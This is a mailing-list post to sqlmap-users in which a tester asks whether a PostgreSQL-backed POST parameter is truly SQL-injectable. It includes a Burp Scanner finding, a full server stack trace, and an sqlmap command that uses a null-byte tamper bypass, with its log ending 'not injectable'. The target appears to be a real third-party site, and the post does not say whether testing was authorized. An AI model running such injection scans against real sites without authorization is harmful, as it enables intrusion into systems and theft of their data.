Hi All
I'm having problems with an injection that I think is real.
It's a standard POST request with one of the parameters of the data sent
being vulnerable. This all happens in an unauthenticated area of the
application, so there's no need to set the cookie value etc.
The injection point was found with Burp Scanner. It has the following to
say:
*Issue detail*
The BLAH parameter appears to be vulnerable to SQL injection attacks. The
payload %00' was submitted in the BLAH parameter, and a database error
message was returned. You should review the contents of the error message,
and the application's handling of other input, to confirm whether a
vulnerability is present. The database appears to be PostgreSQL. The
application attempts to block SQL injection attacks but this can be
circumvented by submitting a URL-encoded NULL byte (%00) before the
characters that are being blocked.
The server response looks like this:
HTTP/1.1 202 Accepted
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/xml;charset=UTF-8
Date: Wed, 14 Dec 2011 12:48:30 GMT
Content-Length: 7754
<?xml version="1.0" encoding="UTF-8"?>
<errors><error><text><![CDATA[could not load an entity:
[vyre.content.CollectionSchema#165']; nested exception is
org.hibernate.exception.DataException: could not load an entity:
[vyre.content.CollectionSchema#165']]]></text><stack-trace><![CDATA[org.springframework.dao.InvalidDataAccessResourceUsageException:
could not load an entity: [vyre.content.CollectionSchema#165']
at
org.springframework.orm.hibernate3.SessionFactoryUtils.convertHibernateAccessException(SessionFactoryUtils.java:618)
at
org.springframework.orm.hibernate3.HibernateAccessor.convertHibernateAccessException(HibernateAccessor.java:412)
at
org.springframework.orm.hibernate3.HibernateTemplate.doExecute(HibernateTemplate.java:424)
at
org.springframework.orm.hibernate3.HibernateTemplate.executeWithNativeSession(HibernateTemplate.java:374)
at
org.springframework.orm.hibernate3.HibernateTemplate.load(HibernateTemplate.java:560)
at
org.springframework.orm.hibernate3.HibernateTemplate.load(HibernateTemplate.java:554)
at
vyre.core.entity.pl.HibernateStringIdentifierEntityDAO.load(HibernateStringIdentifierEntityDAO.java:47)
at sun.reflect.GeneratedMethodAccessor49.invoke(Unknown Source)
at
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
at java.lang.reflect.Method.invoke(Method.java:597)
at
org.springframework.aop.support.AopUtils.invokeJoinpointUsingReflection(AopUtils.java:310)
at
org.springframework.aop.framework.ReflectiveMethodInvocation.invokeJoinpoint(ReflectiveMethodInvocation.java:182)
at
org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:149)
at
org.springframework.transaction.interceptor.TransactionInterceptor.invoke(TransactionInterceptor.java:106)
at
org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:171)
at
org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:204)
at $Proxy17.load(Unknown Source)
at
vyre.publishing.ContentGatewayAjaxListener.handle(ContentGatewayAjaxListener.java:146)
at
vyre.publishing.ajax.AjaxControllerServlet.service(AjaxControllerServlet.java:88)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
at
org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
at
org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at vyre.delivery.MainFilter.doFilter(MainFilter.java:145)
at
org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
at
org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at
vyre.content.search.permissions.ViewPermissionFilter.doFilter(ViewPermissionFilter.java:27)
at
org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
at
org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at
org.springframework.orm.hibernate3.support.OpenSessionInViewFilter.doFilterInternal(OpenSessionInViewFilter.java:198)
at
org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:76)
at
org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
at
org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at
com.virginholidays.filter.CacheControlFilter.doFilter(CacheControlFilter.java:26)
at
org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
at
org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at
vyre.utils.filters.login.AbstractLoginFilter.doFilter(AbstractLoginFilter.java:95)
at
org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
at
org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at
org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:233)
at
org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:191)
at
org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:128)
at
org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)
at
org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:109)
at
org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:568)
at
org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:286)
at
org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:845)
at
org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler.process(Http11Protocol.java:583)
at
org.apache.tomcat.util.net.JIoEndpoint$Worker.run(JIoEndpoint.java:447)
at java.lang.Thread.run(Thread.java:619)
Caused by: org.hibernate.exception.DataException: could not load an entity:
[vyre.content.CollectionSchema#165']
at
org.hibernate.exception.SQLStateConverter.convert(SQLStateConverter.java:77)
at
org.hibernate.exception.JDBCExceptionHelper.convert(JDBCExceptionHelper.java:43)
at org.hibernate.loader.Loader.loadEntity(Loader.java:1874)
at
org.hibernate.loader.entity.AbstractEntityLoader.load(AbstractEntityLoader.java:48)
at
org.hibernate.loader.entity.AbstractEntityLoader.load(AbstractEntityLoader.java:42)
at
org.hibernate.persister.entity.AbstractEntityPersister.load(AbstractEntityPersister.java:3049)
at
org.hibernate.event.def.DefaultLoadEventListener.loadFromDatasource(DefaultLoadEventListener.java:399)
at
org.hibernate.event.def.DefaultLoadEventListener.doLoad(DefaultLoadEventListener.java:375)
at
org.hibernate.event.def.DefaultLoadEventListener.load(DefaultLoadEventListener.java:139)
at
org.hibernate.event.def.DefaultLoadEventListener.proxyOrLoad(DefaultLoadEventListener.java:179)
at
org.hibernate.event.def.DefaultLoadEventListener.onLoad(DefaultLoadEventListener.java:103)
at org.hibernate.impl.SessionImpl.fireLoad(SessionImpl.java:878)
at org.hibernate.impl.SessionImpl.load(SessionImpl.java:795)
at org.hibernate.impl.SessionImpl.load(SessionImpl.java:788)
at
org.springframework.orm.hibernate3.HibernateTemplate$3.doInHibernate(HibernateTemplate.java:566)
at
org.springframework.orm.hibernate3.HibernateTemplate.doExecute(HibernateTemplate.java:419)
... 46 more
Caused by: org.postgresql.util.PSQLException: ERROR: invalid byte sequence
for encoding "UTF8": 0x00
at
org.postgresql.core.v3.QueryExecutorImpl.receiveErrorResponse(QueryExecutorImpl.java:2102)
at
org.postgresql.core.v3.QueryExecutorImpl.processResults(QueryExecutorImpl.java:1835)
at
org.postgresql.core.v3.QueryExecutorImpl.execute(QueryExecutorImpl.java:257)
at
org.postgresql.jdbc2.AbstractJdbc2Statement.execute(AbstractJdbc2Statement.java:500)
at
org.postgresql.jdbc2.AbstractJdbc2Statement.executeWithFlags(AbstractJdbc2Statement.java:388)
at
org.postgresql.jdbc2.AbstractJdbc2Statement.executeQuery(AbstractJdbc2Statement.java:273)
at
org.apache.commons.dbcp.DelegatingPreparedStatement.executeQuery(DelegatingPreparedStatement.java:96)
at
org.apache.commons.dbcp.DelegatingPreparedStatement.executeQuery(DelegatingPreparedStatement.java:96)
at
org.hibernate.jdbc.AbstractBatcher.getResultSet(AbstractBatcher.java:186)
at org.hibernate.loader.Loader.getResultSet(Loader.java:1787)
at org.hibernate.loader.Loader.doQuery(Loader.java:674)
at
org.hibernate.loader.Loader.doQueryAndInitializeNonLazyCollections(Loader.java:236)
at org.hibernate.loader.Loader.loadEntity(Loader.java:1860)
... 59 more
]]></stack-trace></error></errors>
I've worked my way up to the following sqlmap command:
C:\Program Files\sqlmap>python sqlmap.py -u
"http://www.**********/servlet/ajax";
--data "..........&BLAH=165" -p BLAH --level=5 --risk=2 --dbms=postgresql
--union-char=1 --tamper=appendnullbyte -f -b
sqlmap/1.0-dev (r4577) - automatic SQL injection and database takeover
tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsi
bility to obey all applicable local, state and federal laws. Authors assume
no liability and are not responsible for any misuse or
damage caused by this program
[*] starting at 15:33:52
[15:33:52] [INFO] loading tamper script 'appendnullbyte'
[15:33:53] [INFO] using '*****\session' as session file
[15:33:53] [INFO] testing connection to the target url
[15:34:00] [WARNING] provided parameter 'BLAH' is not inside the Cookie
[15:34:00] [INFO] testing if the url is stable, wait a few seconds
[15:34:03] [INFO] url is stable
[15:34:03] [INFO] heuristic test shows that POST parameter 'BLAH' might be
injectable (possible DBMS: PostgreSQL)
[15:34:03] [INFO] testing sql injection on POST parameter 'BLAH'
[15:34:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:34:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause
(Generic comment)'
[15:34:16] [INFO] testing 'Generic boolean-based blind - Parameter replace
(original value)'
[15:34:16] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER
BY clauses'
[15:34:16] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER
BY clauses (original value)'
[15:34:16] [INFO] testing 'PostgreSQL boolean-based blind - Parameter
replace (GENERATE_SERIES - original value)'
[15:34:17] [INFO] testing 'PostgreSQL stacked conditional-error blind
queries'
[15:34:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING
clause'
[15:34:27] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING
clause'
[15:34:32] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[15:34:32] [INFO] testing 'PostgreSQL error-based - GROUP BY and ORDER BY
clauses'
[15:34:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:34:35] [INFO] testing 'PostgreSQL stacked queries (heavy query)'
[15:34:37] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc)'
[15:34:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:34:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind (comment)'
[15:34:44] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[15:34:47] [INFO] testing 'PostgreSQL AND time-based blind (heavy query -
comment)'
[15:34:49] [INFO] testing 'Generic UNION query (1) - 1 to 10 columns'
[15:34:50] [INFO] target url appears to be UNION injectable with 1 columns
[15:34:51] [INFO] target url appears to be UNION injectable with 1 columns
[15:34:53] [INFO] target url appears to be UNION injectable with 1 columns
[15:34:55] [INFO] target url appears to be UNION injectable with 1 columns
[15:34:56] [INFO] target url appears to be UNION injectable with 1 columns
[15:34:58] [INFO] target url appears to be UNION injectable with 1 columns
[15:34:59] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:01] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:02] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:04] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:06] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:07] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:09] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:10] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:11] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:13] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:14] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:16] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:17] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:19] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:20] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:22] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:23] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:25] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:27] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:29] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:30] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:32] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:33] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:35] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:36] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:37] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:39] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:40] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:42] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:42] [INFO] testing 'Generic UNION query (1) - 11 to 20 columns'
[15:36:29] [INFO] testing 'Generic UNION query (1) - 21 to 30 columns'
[15:37:15] [INFO] testing 'Generic UNION query (1) - 31 to 40 columns'
[15:38:01] [INFO] testing 'Generic UNION query (1) - 41 to 50 columns'
[15:38:46] [INFO] testing 'Generic UNION query (NUL comment) (1) - 1 to 10
columns'
[15:38:47] [INFO] target url appears to be UNION injectable with 1 columns
[15:38:50] [INFO] target url appears to be UNION injectable with 1 columns
[15:38:51] [INFO] target url appears to be UNION injectable with 1 columns
[15:38:53] [INFO] target url appears to be UNION injectable with 1 columns
[15:38:54] [INFO] target url appears to be UNION injectable with 1 columns
[15:38:56] [INFO] target url appears to be UNION injectable with 1 columns
[15:38:57] [INFO] target url appears to be UNION injectable with 1 columns
[15:38:59] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:00] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:03] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:04] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:05] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:07] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:08] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:10] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:11] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:13] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:14] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:16] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:18] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:19] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:21] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:22] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:24] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:25] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:27] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:28] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:30] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:31] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:33] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:35] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:37] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:38] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:40] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:41] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:41] [INFO] testing 'Generic UNION query (NUL comment) (1) - 11 to 20
columns'
[15:40:27] [INFO] testing 'Generic UNION query (NUL comment) (1) - 21 to 30
columns'
[15:41:11] [INFO] testing 'Generic UNION query (NUL comment) (1) - 31 to 40
columns'
[15:41:56] [INFO] testing 'Generic UNION query (NUL comment) (1) - 41 to 50
columns'
[15:42:42] [WARNING] POST parameter 'BLAH' is not injectable
[15:42:42] [CRITICAL] all parameters appear to be not injectable. Try to
increase --level/--risk values to perform more tests. As
heuristic test turned out positive you are strongly advised to continue on
with the tests. Please, consider usage of tampering scr
ipts as your target might filter the queries. Also, you can try to rerun by
providing either a valid --string or a valid --regexp,
refer to the user's manual for details
[*] shutting down at 15:42:42
I didn't start with all of those arguments for sqlmap - I've tried it
without: --level=5, --risk=2, --dbms=postgresql, --union-char=1 and
--tamper=appendnullbyte and got pretty much the same results for each.
Maybe it's not injectable, but I'd like peoples input before I write it
off, since it looks very suspect to me.
Thanks
Chris
------------------------------------------------------------------------------
Cloud Computing - Latest Buzzword or a Glimpse of the Future?
This paper surveys cloud computing today: What are the benefits?
Why are businesses embracing it? What are its payoffs and pitfalls?
http://www.accelacomm.com/jaw/sdnl/114/51425149/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
